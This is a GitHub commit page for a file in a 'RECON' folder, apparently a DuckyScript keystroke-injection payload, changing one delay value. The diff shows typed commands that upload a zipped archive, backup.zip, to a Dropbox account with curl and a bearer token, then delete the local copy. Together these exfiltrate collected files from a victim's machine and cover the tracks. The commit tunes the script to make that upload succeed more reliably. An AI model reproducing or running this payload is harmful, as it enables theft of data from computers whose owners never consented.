Skip to content

Commit 7761dcc

Browse files
authored
Updated Delay after curl to allow for a better upload success on Document to Dropbox API .txt
1 parent f5ac292 commit 7761dcc

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

RECON/Document to Dropbox API .txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -29,7 +29,7 @@ DELAY 500
2929
STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <API access token here>" -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip
3030
DELAY 1000
3131
ENTER
32-
DELAY 500
32+
DELAY 10000
3333
STRING rm /tmp/Backup/backup.zip
3434
ENTER
3535
DELAY 500

0 commit comments

Comments
 (0)